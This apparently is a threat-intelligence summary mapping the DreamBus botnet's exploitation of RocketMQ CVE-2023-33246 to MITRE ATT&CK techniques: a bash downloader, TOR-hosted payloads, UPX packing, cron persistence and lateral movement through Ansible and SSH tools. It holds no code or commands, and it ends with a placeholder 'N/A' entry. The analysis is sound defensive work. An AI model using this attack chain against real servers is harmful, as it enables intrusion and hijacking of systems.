DreamBus Botnet Resurfaces, Targets RocketMQ vulnerability | Official Juniper Networks Blogs

MITRE Techniques

• [T1190] Exploit Public-Facing Application – Exploitation of the RocketMQ vulnerability CVE-2023-33246 to gain initial access. Quote: “In May 2023, a vulnerability affecting RocketMQ servers (CVE-2023-33246), which allows remote code execution, was publicly disclosed.”
• [T1059.004] Bash – Use of a malicious bash script (reketed) to download and execute payloads. Quote: “starting on June 19th, we detected a series of attacks that involved downloading and executing a malicious bash script named, “reketed”.”
• [T1105] Ingress Tool Transfer – Downloading the DreamBus main module from remote sources after exploitation. Quote: “The primary function of the reketed bash shell script is to download the DreamBus main module from a TOR hidden service…”
• [T1027] Obfuscated/Compressed Files and Information – UPX-packed DreamBus main module with modified headers/footers to hinder unpacking. Quote: “The DreamBus main module is an ELF Linux binary that has been packed with UPX, but with modified headers and footers that make unpacking more challenging.”
• [T1053] Scheduled Task/Job – Persistence via timer service and cron job hourly to re-download/install payloads. Quote: “timer service” is implemented … hourly basis; “cron job” is created and configured to execute the downloader script … hourly frequency.
• [T1021.004] SSH – Lateral movement using IT automation tools (Ansible, Knife, Salt, PSSH) and infection of remote hosts. Quote: “DreamBus bot malware spread laterally. The malicious threat actors leverage widely recognized IT automation tools like ansible, knife, salt and pssh (parallel ssh).”
• [T1059.003] Command and Scripting Interpreter: PowerShell? (Not used here) – N/A